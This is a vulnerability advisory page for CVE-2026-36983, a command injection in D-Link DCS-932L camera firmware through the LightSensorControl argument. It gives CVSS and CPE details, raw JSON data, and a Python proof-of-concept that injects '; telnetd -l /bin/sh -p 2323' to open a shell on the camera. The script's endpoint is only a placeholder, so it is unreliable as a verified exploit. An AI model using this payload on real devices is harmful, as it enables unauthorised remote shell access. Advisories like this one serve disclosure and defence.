Security Vulnerability Report
中文
CVE-2026-36983 CVSS 7.3 HIGH

CVE-2026-36983

Published: 2026-05-11 18:16:33
Last Modified: 2026-05-12 19:36:42

Description

D-Link DCS-932L v2.18.01 is vulnerable to Command Injection in the function sub_42EF14 of the file /bin/alphapd. The manipulation of the argument LightSensorControl leads to command injection.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dcs-932l_firmware:2.18.01:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dcs-932l:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DCS-932L v2.18.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_ip): target_url = f"http://{target_ip}/some_endpoint" # Actual endpoint depends on reverse engineering # Payload to inject a command (e.g., telnetd or busybox nc) # The vulnerable parameter is LightSensorControl payload = "; telnetd -l /bin/sh -p 2323" data = { "LightSensorControl": payload } try: print(f"[*] Sending payload to {target_ip}...") response = requests.post(target_url, data=data, timeout=5) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Try connecting to port 2323.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with target IP exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36983", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:32.610", "lastModified": "2026-05-12T19:36:42.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link DCS-932L v2.18.01 is vulnerable to Command Injection in the function sub_42EF14 of the file /bin/alphapd. The manipulation of the argument LightSensorControl leads to command injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dcs-932l_firmware:2.18.01:*:*:*:*:*:*:*", "matchCriteriaId": "2AD4BC0A-6ADE-47C3-83D9-288D46A60EA4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dcs-932l:-:*:*:*:*:*:*:*", "matchCriteriaId": "34775D9A-F16B-43C5-A8F4-88C0F9760364"}]}]}], "references": [{"url": "https://github.com/fru1ts/IoT_vul/blob/main/D-Link/DCS-932L.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Product"]}]}}